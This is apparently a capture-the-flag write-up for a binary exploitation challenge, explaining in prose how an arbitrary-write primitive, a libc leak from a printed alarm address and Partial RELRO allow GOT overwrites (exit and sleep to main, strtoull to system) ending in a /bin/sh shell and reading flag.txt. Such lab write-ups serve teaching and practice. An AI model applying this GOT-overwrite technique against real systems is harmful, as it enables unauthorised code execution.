Last updated
Last updated
It takes an address and number in hex, then writes the number to the address. The hex is parsed by strtoull which will be useful later.
After writing, it calls sleep(0xf)
, then prints the address of alarm and calls exit. The address of alarm gives us a libc leak. Partial RELRO, so GOT overwrite is possible. Here's what we do:
Overwrite exit@got with main. When it attempts to exit after printing a libc pointer to us, it'll call main, giving us another write
Overwrite sleep@got with main(we couldn't do this before as alarm is called after sleep but we dont need anymore leaks) so that the alarm doesnt catch us out and our exploit is quick from then on
Overwrite strtoull@got with system so next time it tries to turn our input to hex it calls system on it
Enter /bin/sh as the next address
Shell will be popped, we can cat flag.txt.